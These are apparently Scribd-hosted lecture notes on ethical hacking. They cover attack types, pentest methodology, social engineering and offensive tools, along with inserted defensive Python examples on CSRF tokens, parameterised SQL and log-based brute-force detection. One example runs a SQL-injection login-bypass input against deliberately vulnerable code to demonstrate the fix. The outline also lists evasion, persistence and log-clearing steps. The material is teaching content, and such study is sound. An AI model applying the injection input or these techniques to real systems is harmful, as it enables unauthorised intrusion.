Cyber Security and Ethical Hacking

The document provides an overview of cyber security and ethical hacking, detailing various types of hacking, including ethical, black hat, and grey hat hacking. It outlines the ethical hacking methodology, key security concepts, and the importance of social engineering in cybersecurity. Additionally, it emphasizes the role of ethical hackers in identifying vulnerabilities and improving security measures within organizations.

Uploaded by

juhi79865
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
162 views57 pages

Cyber Security and Ethical Hacking

The document provides an overview of cyber security and ethical hacking, detailing various types of hacking, including ethical, black hat, and grey hat hacking. It outlines the ethical hacking methodology, key security concepts, and the importance of social engineering in cybersecurity. Additionally, it emphasizes the role of ethical hackers in identifying vulnerabilities and improving security measures within organizations.

Uploaded by

juhi79865
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 57

Cyber Security and Ethical Hacking

Chapter 1:

Hacking refers to the process of exploiting weaknesses in a computer system, network, or
software to gain unauthorized access, steal data, or cause damage. While hacking is often
associated with cybercriminal activities, it can also be used ethically to enhance security and
protect digital systems. Ethical hacking involves authorized security professionals (ethical
hackers) testing and improving system defenses.

Types of Hacking
Hacking can be categorized into different types based on intent and methodology:

1. Ethical Hacking (White Hat Hacking)
    ○ Conducted by security professionals to find and fix vulnerabilities.
    ○ Legal and performed with proper authorization.
    ○ Helps organizations improve cybersecurity.
2. Black Hat Hacking
    ○ Involves unauthorized access to systems for malicious purposes.
    ○ Used for data theft, financial fraud, cyber espionage, and destruction.
    ○ Illegal and punishable under cyber laws.
3. Grey Hat Hacking
    ○ Falls between ethical and black hat hacking.
    ○ Hackers exploit vulnerabilities without permission but may inform the organization afterward.
    ○ Still considered illegal if done without authorization.
4. Script Kiddies
    ○ Inexperienced hackers who use pre-written tools and scripts to exploit systems.
    ○ Often attack websites and networks for fun or recognition.
5. Hacktivism
    ○ Hacking done for political or social activism.
    ○ Targets government websites, corporations, or organizations to spread messages.
6. State-Sponsored Hacking
    ○ Conducted by governments to spy, gather intelligence, or disrupt foreign systems.
    ○ Used in cyber warfare and espionage.

Hacking Process (Ethical Hacking Methodology)

Ethical hackers follow a systematic approach to identify and fix vulnerabilities in a system. The
hacking process includes the following steps:

1. Reconnaissance (Information Gathering)

● Collecting information about the target system using public and open-source methods.
● Passive Reconnaissance: No direct interaction with the target (e.g., searching online).
● Active Reconnaissance: Directly engaging with the target (e.g., scanning ports).

2. Scanning & Enumeration

● Identifying live hosts, open ports, and services running on a target system.
● Using tools like Nmap, Nessus, and Wireshark to analyze vulnerabilities.

3. Gaining Access

● Exploiting vulnerabilities to enter the system.
● Using malware, phishing, password cracking, and SQL injection techniques.

4. Maintaining Access (Persistence)

● Creating backdoors or establishing control to retain access to the system.
● Attackers install rootkits, Trojans, or modify system configurations.

5. Covering Tracks (Clearing Evidence)

● Deleting logs, clearing history, and hiding malicious activities.
● Ensures that hackers remain undetected for longer periods.

6. Reporting & Fixing (For Ethical Hackers)

● Ethical hackers document vulnerabilities and suggest fixes.
● Security teams patch weaknesses and strengthen defenses.

Conclusion
Hacking plays a crucial role in cybersecurity. While black hat hacking poses serious threats,
ethical hacking helps organizations identify risks and protect their digital assets. Learning ethical
hacking techniques is essential for cybersecurity professionals to secure systems against cyber
threats.

1. Basics of Security
Security is the practice of protecting digital assets from unauthorized access, attacks, and
damage. It includes various measures to safeguard data, networks, and systems from cyber
threats.

Types of Security

● Network Security – Protects networks from cyber threats such as malware, DDoS attacks, and unauthorized access.
● Information Security – Ensures data privacy and prevents unauthorized data access or modification.
● Application Security – Protects software applications from vulnerabilities and attacks.
● Operational Security – Involves securing operational processes, including user permissions and data handling.
● Physical Security – Protects hardware, servers, and devices from theft, damage, or unauthorized access.

2. Elements of Security
The key elements of security form the foundation of cyber security and ethical hacking. The
most common framework is the CIA Triad.

A. CIA Triad

1. Confidentiality – Ensures that only authorized users can access sensitive data.
2. Integrity – Prevents unauthorized modification of data, ensuring accuracy and trustworthiness.
3. Availability – Ensures that data and services are accessible when needed.

B. Other Security Elements

4. Authentication – Verifies the identity of users accessing a system.
5. Authorization – Grants specific permissions based on user roles.
6. Non-repudiation – Ensures that actions taken within a system cannot be denied.
7. Accountability – Tracks and logs user activities for audit and security analysis.

3. Security Threats in Cyber Security

● Malware (Viruses, Trojans, Ransomware, Spyware)
● Phishing Attacks
● Denial-of-Service (DoS) and Distributed Denial-of-Service (DDoS) Attacks
● SQL Injection
● Man-in-the-Middle (MITM) Attacks
● Zero-Day Exploits

4. Ethical Hacking and Security

Ethical hackers use hacking techniques to test and improve security. They follow legal and
ethical guidelines to identify and fix vulnerabilities before malicious hackers exploit them.

Key Roles of an Ethical Hacker

● Performing penetration testing.
● Identifying security loopholes.
● Strengthening network and system security.
● Ensuring compliance with security policies.

Security is an ongoing process that requires continuous monitoring, updates, and improvements
to counter evolving cyber threats. Ethical hacking plays a crucial role in maintaining a secure
digital environment.

Penetration testing (or pen testing) is a crucial aspect of cybersecurity and ethical hacking,
aimed at identifying vulnerabilities in systems, networks, and web applications. Here's a
breakdown of key components related to web-based exploitation in penetration testing:

🔹 1. Penetration Testing Process

Penetration testing involves a structured approach to identifying and exploiting vulnerabilities in
a system:

1. Reconnaissance – Gathering information about the target.
2. Scanning – Identifying live hosts, open ports, and services.
3. Exploitation – Using vulnerabilities to gain access.
4. Post-Exploitation – Maintaining access and extracting information.
5. Reporting – Documenting vulnerabilities and suggesting fixes.

🔹 2. Scanning Techniques

Before exploitation, scanning helps in identifying attack vectors:

● Port Scanning: Identifies open ports (e.g., using Nmap).
● Vulnerability Scanning: Detects weaknesses (e.g., Nessus, OpenVAS).
● Directory Busting: Finds hidden directories (e.g., Gobuster, Dirb).
● Web Application Scanning: Checks for OWASP Top 10 vulnerabilities (e.g., Burp Suite, Nikto).

🔹 3. Web-Based Exploitation

Web applications often have vulnerabilities that attackers exploit:

🛠 Common Web-Based Attacks

1. SQL Injection (SQLi) – Injecting malicious SQL queries (Tools: SQLmap).
2. Cross-Site Scripting (XSS) – Injecting JavaScript in web pages (Tools: XSSer, BeEF).
3. Cross-Site Request Forgery (CSRF) – Forcing users to perform unintended actions.
4. Remote Code Execution (RCE) – Executing arbitrary code on a server.
5. File Inclusion Attacks – Exploiting Local/Remote File Inclusion (LFI/RFI).
6. Broken Authentication & Session Management – Bypassing authentication mechanisms.
7. Server-Side Request Forgery (SSRF) – Exploiting backend systems via crafted requests.
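
The CSRF entry above names the attack but not the server-side check that defeats it. The following is an added example, not code from the original notes: a minimal anti-CSRF token scheme using only Python's standard library, where the token is an HMAC over the session identifier under a server-held secret. The `mint_csrf_token`/`verify_csrf_token`/`handle_transfer` names, the `SERVER_SECRET` variable and the session ids are constructed for this illustration.

```python
import hashlib
import hmac
import secrets
from typing import Optional

# Constructed server-side key for this example. A real deployment loads it from
# a secrets store; it must never be sent to the browser.
SERVER_SECRET = secrets.token_bytes(32)


def mint_csrf_token(session_id: str) -> str:
    """Derive the anti-CSRF token for one session: HMAC-SHA256(secret, session_id).

    The server embeds this in its own forms. A page on another origin cannot read
    it, because the same-origin policy keeps it from seeing the victim's page.
    """
    return hmac.new(SERVER_SECRET, session_id.encode("utf-8"), hashlib.sha256).hexdigest()


def verify_csrf_token(session_id: str, submitted: Optional[str]) -> bool:
    """True only if the submitted token is the one minted for *this* session.

    compare_digest runs in constant time, so the check leaks nothing about how
    many leading characters of a guess were right.
    """
    if not submitted:
        return False
    return hmac.compare_digest(mint_csrf_token(session_id), submitted)


def handle_transfer(form: dict, session_id: str) -> str:
    """Hypothetical POST /transfer handler. The CSRF check runs before any state
    change. The session id comes from the session cookie, which the browser
    attaches to every request automatically, which is exactly why the cookie
    alone cannot prove the user intended this request."""
    if not verify_csrf_token(session_id, form.get("csrf_token")):
        return "403 Forbidden: missing or invalid CSRF token"
    return f"200 OK: transferred {form['amount']} to {form['to']}"


if __name__ == "__main__":
    victim_session = "sess-victim-001"
    # A form rendered by the site itself carries the token for this session.
    own_form = {"to": "alice", "amount": "10",
                "csrf_token": mint_csrf_token(victim_session)}
    print(handle_transfer(own_form, victim_session))
    # A cross-site form arrives with the victim's cookie but without a token.
    forged_form = {"to": "mallory", "amount": "10"}
    print(handle_transfer(forged_form, victim_session))
```

In a real application the token travels in a hidden form field or a custom request header, and the session id is read from the session cookie. Marking that cookie `SameSite` is an independent layer; the two are normally combined.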

🛠 Exploitation Tools

● Burp Suite – Web vulnerability scanner & proxy tool.
● Metasploit – Framework for exploitation.
● SQLmap – Automated SQL injection tool.
● BeEF – Browser Exploitation Framework for XSS attacks.
● OWASP ZAP – Web vulnerability scanner.

🔹 4. Post-Exploitation

Once a system is exploited, attackers aim to:

● Escalate Privileges (Gain admin/root access).
● Establish Persistence (Backdoors, web shells like Weevely).
● Exfiltrate Data (Steal sensitive data).
● Lateral Movement (Spread through the network).

🔹 5. Mitigation & Prevention

● Input Validation & Sanitization to prevent SQLi/XSS.
● Secure Authentication Mechanisms (MFA, strong passwords).
● Web Application Firewalls (WAF) to block attacks.
● Regular Security Patching to fix known vulnerabilities.
● Least Privilege Principle to restrict access.
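
The first mitigation above, input validation to prevent SQLi, is easier to see in code than in a bullet. As an added example (not part of the original notes), the following Python shows a login lookup built by string concatenation beside the same lookup with bound parameters, plus an allow-list check on the username. The `users` table, its single row, the `login_vulnerable`/`login_safe` function names and the `USERNAME_RE` pattern are constructed for this example; sqlite3 stands in for whatever database the application uses.

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table with one account (password already hashed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'hash-of-alice-password')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password_hash: str) -> bool:
    """The 'before' form: user input is spliced into the SQL text, so a quote
    character in the input changes the statement's grammar instead of its data."""
    query = ("SELECT 1 FROM users WHERE username = '" + username
             + "' AND password_hash = '" + password_hash + "'")
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password_hash: str) -> bool:
    """The hardened form: the statement text is fixed and the values travel
    separately as bound parameters, so the engine never parses them as SQL."""
    query = "SELECT 1 FROM users WHERE username = ? AND password_hash = ?"
    return conn.execute(query, (username, password_hash)).fetchone() is not None


# Allow-list validation: accept only what a username may legitimately contain.
# This is defence in depth; the bound parameters are what actually stop SQLi.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def valid_username(username: str) -> bool:
    return USERNAME_RE.fullmatch(username) is not None


if __name__ == "__main__":
    db = make_db()
    # Textbook comment-terminated input: in the concatenated query the rest of
    # the WHERE clause becomes a comment, so the password check disappears.
    bypass = "alice' --"
    print("vulnerable query accepts it:", login_vulnerable(db, bypass, "wrong"))
    print("parameterised query accepts it:", login_safe(db, bypass, "wrong"))
    print("allow-list accepts it:", valid_username(bypass))
```

The same two functions are a useful unit test for a code base: any login helper that returns True for the `bypass` input with a wrong password is still building SQL from strings.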

🔹 6. Ethical Hacking & Legal Considerations

● Always get permission before testing (Penetration Testing Agreement).
● Follow ethical hacking principles to report and fix vulnerabilities.
● Be aware of cyber laws such as the Computer Fraud and Abuse Act (CFAA).

Chapter 2:

Ethical hacking is a crucial aspect of cybersecurity that involves testing and securing systems by
identifying vulnerabilities before malicious hackers can exploit them. It is also known as
penetration testing or white-hat hacking and plays a significant role in strengthening an
organization's defense against cyber threats.

🔹 Key Aspects of Ethical Hacking in Cybersecurity

1. Reconnaissance (Information Gathering)
    ○ Passive and active footprinting
    ○ OSINT (Open-Source Intelligence) gathering
    ○ Social engineering tactics
2. Scanning and Enumeration
    ○ Identifying live hosts and open ports
    ○ Using tools like Nmap, Nessus, and OpenVAS
    ○ Extracting system details and network information
3. Exploitation and Gaining Access
    ○ Identifying system vulnerabilities
    ○ Exploiting weak passwords, misconfigurations, or outdated software
    ○ Using Metasploit, Burp Suite, or other hacking frameworks
4. Privilege Escalation and Maintaining Access
    ○ Elevating permissions (root/admin access)
    ○ Deploying backdoors and persistence techniques
5. Covering Tracks and Post-Exploitation
    ○ Clearing logs and hiding malicious activity
    ○ Exfiltrating data securely

🔹 Popular Ethical Hacking Tools

● Kali Linux – A penetration testing OS with pre-installed hacking tools
● Metasploit – For exploiting vulnerabilities in networks and applications
● Wireshark – A network protocol analyzer for sniffing traffic
● Burp Suite – For web application security testing
● John the Ripper – A password-cracking tool

🔹 Certifications in Ethical Hacking

● CEH (Certified Ethical Hacker) – EC-Council
● OSCP (Offensive Security Certified Professional)
● CompTIA Security+ and PenTest+
● GIAC Penetration Tester (GPEN)

Hacking methodology in cybersecurity and ethical hacking follows a structured approach to
identifying and exploiting vulnerabilities in a system. Ethical hackers use these methodologies
legally and with permission to improve security. Here's a breakdown of the key steps:

1. Reconnaissance (Footprinting)

● Gathering information about the target system.
● Two types:
    ○ Passive Reconnaissance: Collecting data without directly interacting with the target (e.g., WHOIS lookup, social media analysis).
    ○ Active Reconnaissance: Direct interaction with the target (e.g., network scanning, DNS queries).

2. Scanning & Enumeration

● Identifying live hosts, open ports, and services running on the target.
● Tools: Nmap, Nessus, OpenVAS
● Types:
    ○ Network Scanning: Detecting active devices.
    ○ Port Scanning: Finding open ports.
    ○ Service Enumeration: Identifying services and versions.

3. Gaining Access (Exploitation)

● Exploiting vulnerabilities to gain control over the system.
● Methods:
    ○ Brute Force Attacks (password guessing)
    ○ Exploiting Software Vulnerabilities
    ○ Phishing & Social Engineering
● Tools: Metasploit, Hydra, SQLmap

4. Maintaining Access (Persistence)

● Ensuring continued access after exploitation.
● Methods:
    ○ Creating backdoors
    ○ Privilege escalation
    ○ Rootkits, Trojans
● Tools: Netcat, Mimikatz

5. Covering Tracks (Clearing Evidence)

● Hiding malicious activities to avoid detection.
● Methods:
    ○ Clearing logs
    ○ Deleting evidence
    ○ Disabling security mechanisms
● Tools: Timestomp, Stealth Rootkits

6. Reporting & Remediation (For Ethical Hacking)

● Documenting vulnerabilities and how they were exploited.
● Providing mitigation strategies to fix security flaws.
● Delivering reports to stakeholders.

Social Engineering in Cybersecurity and Ethical Hacking

What is Social Engineering?

Social engineering is a cyberattack technique that exploits human psychology to manipulate
individuals into revealing confidential information or performing actions that compromise
security. Unlike traditional hacking, which targets system vulnerabilities, social engineering
attacks target people as the weakest link in cybersecurity.

Types of Social Engineering Attacks

1. Phishing – Attackers send fraudulent emails, messages, or websites to trick users into providing sensitive information such as passwords, credit card numbers, or personal details.
    ○ Variants: Spear phishing (targeted attacks), Whaling (high-profile targets), Smishing (SMS phishing), and Vishing (voice phishing).
2. Pretexting – The attacker fabricates a scenario (pretext) to gain trust and extract information. Example: Pretending to be IT support staff to ask for login credentials.
3. Baiting – Attackers lure victims by offering something enticing, such as free software downloads or USB devices loaded with malware.
4. Tailgating (Piggybacking) – Gaining physical access to restricted areas by following an authorized person, often by pretending to be an employee or contractor.
5. Quid Pro Quo – Offering a service or benefit in exchange for sensitive information. Example: A scammer posing as a tech support agent offering to fix a problem but actually installing malware.
6. Dumpster Diving – Searching through discarded documents, hard drives, or devices to find confidential data like passwords, account details, or company information.

Real-World Examples of Social Engineering Attacks

● 2016 Democratic National Committee (DNC) Hack: Hackers used spear phishing emails to gain access to DNC systems.
● Google and Facebook Scam (2013-2015): Attackers tricked employees into wiring over $100 million by posing as a vendor using fake invoices.
● Kevin Mitnick's Attacks: One of the most infamous hackers, Mitnick used social engineering to manipulate people into providing sensitive information.

Defensive Measures Against Social Engineering

1. Security Awareness Training – Educate employees and individuals on recognizing and avoiding social engineering tactics.
2. Multi-Factor Authentication (MFA) – Adding an extra layer of security reduces the risk of credential theft.
3. Verification Policies – Always verify a request before sharing sensitive information or granting access.
4. Email Filtering & Anti-Phishing Tools – Implement spam filters and security solutions that detect phishing attempts.
5. Least Privilege Principle – Limit user access to only necessary resources to reduce exposure.
6. Physical Security Measures – Restrict access to critical areas and use ID verification for entry.

Ethical Hacking & Social Engineering

Ethical hackers (penetration testers) use social engineering techniques to assess security
vulnerabilities. Organizations hire them to simulate attacks and identify weaknesses in human
security practices. Common ethical hacking techniques include:

● Phishing simulations to test employee awareness.
● Pretexting exercises to see if employees follow security protocols.
● Physical security testing (e.g., attempting unauthorized access).

1. Physical Security in Cybersecurity

Physical security is the first layer of cybersecurity, focusing on preventing unauthorized physical
access to computers, networks, and data.

Key Aspects:

● Access Control: Using biometric scanners, key cards, or PINs to restrict access to critical areas.
● Security Cameras & Surveillance: Monitoring server rooms and workspaces to detect unauthorized entry.
● RFID & Smart Locks: Ensuring that only authorized personnel can enter restricted areas.
● Tamper-proof Devices: Laptops, USBs, and hardware should have anti-tampering mechanisms.
● Social Engineering Protection: Preventing tailgating, dumpster diving, and unauthorized personnel from accessing secured locations.
● Data Center Security: Securing physical servers with locked racks, fire suppression systems, and environmental monitoring.

Attacks on Physical Security:

● Tailgating: An attacker follows an authorized person into a secure area.
● Shoulder Surfing: Observing someone entering a password or PIN.
● Dumpster Diving: Extracting sensitive data from discarded documents or hardware.
● Hardware Implants: Placing malicious hardware like keyloggers or rogue devices inside company systems.

2. Hacking Windows
Windows is one of the most widely used operating systems, making it a primary target for
hackers.

Common Windows Exploits:

● Privilege Escalation: Exploiting vulnerabilities to gain higher system privileges.
● DLL Injection: Injecting malicious DLLs into legitimate processes.
● Pass-the-Hash Attack: Using hashed credentials to authenticate without knowing the actual password.
● Remote Code Execution (RCE): Running arbitrary code on a target machine using Windows vulnerabilities.
● SMB Exploits (EternalBlue, WannaCry): Exploiting outdated SMB (Server Message Block) protocols.
● PowerShell Attacks: Using PowerShell scripts to automate attacks, execute malware, or bypass security tools.

Tools for Hacking Windows:

● Mimikatz: Extracting Windows passwords from memory.
● Metasploit: Running exploits and payloads against Windows machines.
● Empire: Post-exploitation framework for Windows.
● Windows Exploit Suggester: Checking for missing patches and vulnerabilities.

Protection Against Windows Hacking:

● Keep Windows updated with the latest patches.
● Use Windows Defender + EDR (Endpoint Detection and Response).
● Disable unnecessary services (like SMBv1).
● Enable BitLocker encryption to protect data.
● Use strong password policies and multi-factor authentication (MFA).

3. Password Hacking
Passwords are a weak link in security, often exploited using various techniques.

Types of Password Attacks:

● Brute Force Attack: Trying all possible combinations until the correct password is found.
● Dictionary Attack: Using a list of common passwords to guess the correct one.
● Credential Stuffing: Using leaked username-password combinations from data breaches.
● Rainbow Table Attack: Precomputed hashes of passwords are used to crack hashed passwords.
● Keylogging: Recording keystrokes using hardware or software keyloggers.
● Phishing: Tricking users into revealing their passwords through fake emails or websites.
● Social Engineering: Manipulating people into revealing their credentials.

Tools for Password Cracking:

● John the Ripper: A fast password-cracking tool.
● Hashcat: The fastest password recovery tool using GPU acceleration.
● Hydra: Online password brute-force tool.
● Cain & Abel: Password recovery and cracking tool for Windows.

Protection Against Password Hacking:

● Use long and complex passwords (at least 12–16 characters).
● Implement MFA (Multi-Factor Authentication).
● Use password managers to generate and store strong passwords.
● Never reuse passwords across multiple accounts.
● Use account lockout policies to prevent brute-force attacks.
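
The last protection above, account lockout, depends on noticing repeated failures quickly, and the credential-stuffing entry earlier in this section describes a pattern a per-account counter never sees. The following is an added example, not part of the original notes: detection logic in Python run over a few constructed, syslog-style authentication lines. It flags one user/source pair that crosses a failure threshold inside a sliding window (the lockout rule) and one source that fails against several different accounts (the spray/stuffing pattern). The log lines, addresses, user names, the OpenSSH-like layout and the thresholds are all constructed for this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed sample log. Addresses are from documentation ranges and the layout
# imitates an OpenSSH auth log; nothing here came from a real host.
SAMPLE_LOG = """\
2024-05-01T10:00:01 sshd[101]: Failed password for alice from 203.0.113.5 port 4001
2024-05-01T10:00:03 sshd[101]: Failed password for alice from 203.0.113.5 port 4002
2024-05-01T10:00:05 sshd[101]: Failed password for alice from 203.0.113.5 port 4003
2024-05-01T10:00:07 sshd[101]: Failed password for alice from 203.0.113.5 port 4004
2024-05-01T10:00:09 sshd[101]: Failed password for alice from 203.0.113.5 port 4005
2024-05-01T10:00:11 sshd[101]: Failed password for alice from 203.0.113.5 port 4006
2024-05-01T10:01:00 sshd[102]: Failed password for bob from 198.51.100.7 port 5001
2024-05-01T10:01:20 sshd[102]: Accepted password for bob from 198.51.100.7 port 5002
2024-05-01T10:02:00 sshd[103]: Failed password for carol from 203.0.113.9 port 6001
2024-05-01T10:02:01 sshd[103]: Failed password for dave from 203.0.113.9 port 6002
2024-05-01T10:02:02 sshd[103]: Failed password for erin from 203.0.113.9 port 6003
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: (?P<outcome>Failed|Accepted) password for "
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

Event = Tuple[datetime, str, str, str]  # (timestamp, outcome, user, ip)


def parse_auth_log(text: str) -> List[Event]:
    """Turn matching lines into events; lines in any other format are skipped."""
    events: List[Event] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["outcome"],
                           m["user"], m["ip"]))
    return events


def detect_bruteforce(events: List[Event], threshold: int = 5,
                      window: timedelta = timedelta(minutes=10)) -> Dict[Tuple[str, str], datetime]:
    """Map (user, ip) -> time of the failure that reached `threshold` within `window`.

    Sliding window per (user, ip); a successful login resets the count, which is
    the same rule an account-lockout policy applies.
    """
    recent: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    alerts: Dict[Tuple[str, str], datetime] = {}
    for ts, outcome, user, ip in sorted(events):
        key = (user, ip)
        if outcome == "Accepted":
            recent[key].clear()
            continue
        bucket = recent[key]
        bucket.append(ts)
        while bucket and ts - bucket[0] > window:   # expire failures outside the window
            bucket.pop(0)
        if len(bucket) >= threshold and key not in alerts:
            alerts[key] = ts
    return alerts


def detect_spray(events: List[Event], min_users: int = 3) -> Dict[str, List[str]]:
    """Map ip -> sorted user list for sources that failed against >= min_users accounts.

    Per-account lockout misses this: each account sees only one or two failures.
    The signal is the fan-out from a single source.
    """
    users_by_ip: Dict[str, set] = defaultdict(set)
    for _, outcome, user, ip in events:
        if outcome == "Failed":
            users_by_ip[ip].add(user)
    return {ip: sorted(users) for ip, users in users_by_ip.items() if len(users) >= min_users}


if __name__ == "__main__":
    evts = parse_auth_log(SAMPLE_LOG)
    for (user, ip), when in detect_bruteforce(evts).items():
        print(f"lockout candidate: {user} from {ip} at {when.time()}")
    for ip, users in detect_spray(evts).items():
        print(f"password spray from {ip} against {', '.join(users)}")
```

The thresholds are policy, not fact: five failures in ten minutes is a common lockout default, and the spray detector is deliberately separate because the two patterns need different responses (lock the account versus block or rate-limit the source).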

4. Privacy Attacks
Privacy attacks focus on stealing, monitoring, or manipulating personal or organizational data.

Common Privacy Attacks:

● MITM (Man-in-the-Middle) Attack: Intercepting communication between two parties (e.g., unsecured Wi-Fi).
● Data Exfiltration: Stealing sensitive data from a system.
● Tracking & Fingerprinting: Using cookies, trackers, and browser fingerprinting to collect user data.
● Spyware & Keyloggers: Secretly monitoring and recording user activity.
● Webcam & Microphone Hacking: Exploiting device permissions to eavesdrop on users.
● Metadata Exploitation: Extracting information from file metadata (e.g., geolocation from images).
● Rogue Apps & Extensions: Malicious applications collecting private user data.

Tools Used in Privacy Attacks:

● Wireshark: Sniffing and analyzing network traffic.
● Evilginx: Advanced phishing and MITM attack tool.
● BeEF (Browser Exploitation Framework): Exploiting browser vulnerabilities.
● SpyNote: Android spyware for remote surveillance.

Protection Against Privacy Attacks:

● Use a VPN to encrypt internet traffic.
● Block third-party cookies & tracking scripts in browsers.
● Keep software and browsers updated to patch vulnerabilities.
● Use anti-spyware tools and regular security scans.
● Cover your webcam and mute microphones when not in use.

1. Hacking the Network

Network hacking involves compromising or testing the security of networks. It includes
techniques like sniffing, spoofing, session hijacking, and DoS/DDoS attacks.

🔹 Key Concepts:

● Network Basics – OSI model, TCP/IP protocols, ports, firewalls, NAT, proxies.
● Packet Sniffing – Capturing network traffic using tools like Wireshark, tcpdump, Ettercap.
● IP & MAC Spoofing – Changing IP/MAC addresses to impersonate devices.
● MITM (Man-in-the-Middle) Attacks – Intercepting communication using Bettercap, ARP spoofing, SSL stripping.
● Session Hijacking – Exploiting active sessions (e.g., cookie theft using Burp Suite).
● DNS Spoofing & Poisoning – Redirecting users to malicious sites.
● Wireless Hacking – Cracking Wi-Fi networks (WEP, WPA/WPA2) using Aircrack-ng, Reaver, Fern WiFi Cracker.
● DDoS (Distributed Denial of Service) – Overloading networks using LOIC, HOIC, Slowloris, botnets.

2. Hacking Windows OS
Windows systems are common targets due to their widespread usage.

🔹 Exploiting Windows Security Flaws:

● Privilege Escalation – Exploiting vulnerabilities to gain admin access (e.g., kernel exploits, UAC bypass).
● Password Cracking – Extracting passwords from the SAM file or hashes using Mimikatz, John the Ripper, Hashcat.
● DLL Injection & Process Hollowing – Running malicious code in legitimate processes.
● Remote Exploits – Using tools like Metasploit, Empire, PsExec, RDP exploits.
● Registry Manipulation – Editing the Windows Registry for persistence and backdoors.
● Windows Defender Evasion – Bypassing security tools with obfuscation, AMSI bypass techniques.

🔹 Tools for Windows Hacking:

● Metasploit Framework – Exploiting Windows vulnerabilities.
● Mimikatz – Extracting passwords and credentials from memory.
● Empire & Cobalt Strike – Post-exploitation and persistence.
● BloodHound – Mapping Active Directory (AD) attack paths.
● PowerShell Empire – Fileless malware attacks via PowerShell.

3. Hacking Linux OS
Linux is widely used in servers, making it a critical target for ethical hackers.

🔹 Linux Security Exploits:

● Privilege Escalation – Exploiting SUID binaries, misconfigured sudo, and kernel vulnerabilities.
● Brute-force SSH Access – Using tools like Hydra, Medusa to crack SSH credentials.
● File Permission Exploits – Misconfigured permissions allowing unauthorized access.
● Exploiting Weak Services – Attacking FTP, Telnet, MySQL, Apache vulnerabilities.
● Kernel Exploits – Using Dirty COW, PwnKit, ExploitDB for root access.
● Backdooring Linux Systems – Persistent access with cron jobs, rootkits, PAM backdoors.

🔹 Tools for Linux Hacking:

● Linux Exploit Suggester – Identifies potential privilege escalation vulnerabilities.
● LinPEAS & LinEnum – Linux privilege escalation auditing tools.
● Chisel & ProxyChains – Tunneling for bypassing firewalls.
● Netcat – Reverse shells and remote access.
● Hydra & John the Ripper – Password cracking.

Next Steps in Cybersecurity & Ethical Hacking

● Set up a Pentesting Lab – Install Kali Linux, Parrot OS in a virtual machine.
● Practice with CTFs (Capture The Flag) – Try platforms like Hack The Box, TryHackMe.
● Learn Scripting – Python & Bash scripting for automation.
● Understand Malware Analysis – Reverse engineering malware using IDA Pro, Ghidra.

1. Application Hacking
Definition

Application hacking refers to exploiting vulnerabilities in software applications, such as web
apps, desktop apps, or mobile apps, to gain unauthorized access, disrupt services, or steal data.

Techniques Used in Application Hacking

1. Web Application Attacks
    ○ SQL Injection (SQLi): Injecting malicious SQL queries into web forms to manipulate databases.
    ○ Cross-Site Scripting (XSS): Injecting malicious scripts into websites that execute in users' browsers.
    ○ Cross-Site Request Forgery (CSRF): Tricking users into executing unwanted actions.
    ○ Directory Traversal: Accessing restricted directories on the server.
    ○ Remote File Inclusion (RFI) & Local File Inclusion (LFI): Uploading malicious files to exploit vulnerabilities.
2. Desktop Application Attacks
    ○ Buffer Overflow: Overloading a program's memory to execute arbitrary code.
    ○ Privilege Escalation: Exploiting application flaws to gain higher privileges.
    ○ Reverse Engineering: Analyzing app code to find vulnerabilities.
3. Mobile Application Attacks
    ○ APK Reverse Engineering: Decompiling Android apps to find vulnerabilities.
    ○ Insecure Data Storage: Exploiting weak storage mechanisms in apps.

2. Footprinting
Definition

Footprinting is the process of gathering information about a target system, network, or
organization to plan an attack. This can be passive (indirect, without interacting with the target)
or active (direct interaction with the target).

Types of Footprinting

1. Passive Footprinting:
    ○ Searching public databases, social media, and job listings.
    ○ Checking domain records using WHOIS Lookup.
    ○ Using Google Dorking to find exposed files or pages.
2. Active Footprinting:
    ○ Directly interacting with the target system.
    ○ Using network sniffing tools like Wireshark to analyze traffic.
    ○ Probing firewalls and security measures.

Tools for Footprinting

● Shodan (Search for exposed devices and open ports).
● Maltego (Graph-based footprinting).
● Recon-ng (OSINT tool for gathering data).
● Google Dorking (Using advanced Google search queries).

3. Scanning
Definition

Scanning involves actively probing a system or network to detect open ports, running services,
and potential vulnerabilities.

Types of Scanning

1. Network Scanning
    ○ Identifies live hosts, open ports, and active services.
    ○ Uses tools like Nmap, Angry IP Scanner.
2. Port Scanning
    ○ Checks which network ports are open and can be exploited.
    ○ Uses Nmap, Netcat, Masscan.
3. Vulnerability Scanning
    ○ Detects known security flaws in a system.
    ○ Uses Nessus, OpenVAS, Acunetix.
4. Web Application Scanning
    ○ Identifies vulnerabilities in web applications.
    ○ Uses Burp Suite, OWASP ZAP.

Tools for Scanning

● Nmap (Network scanning & fingerprinting).
● Nikto (Web server scanning).
● Nessus (Comprehensive vulnerability scanner).
● OWASP ZAP (Automated web application scanner).

4. Enumeration
Definition

Enumeration is the process of extracting information from a target system after identifying active
hosts and open ports.

Types of Enumeration

1. User Enumeration
    ○ Extracting valid usernames via login pages, email services, or directories.
    ○ Tools: Metasploit, Enum4Linux, THC Hydra.
2. Network Enumeration
    ○ Finding shared resources, active directories, and network shares.
    ○ Tools: nbtscan, SNMPwalk.
3. DNS Enumeration
    ○ Gathering DNS records, subdomains, and MX records.
    ○ Tools: dnsenum, Fierce, Sublist3r.
4. SMB Enumeration
    ○ Extracting information from Windows SMB shares.
    ○ Tools: Enum4Linux, SMBmap.

Tools for Enumeration

● Metasploit (Powerful exploitation framework).
● Enum4Linux (Extracts Windows/Samba info).
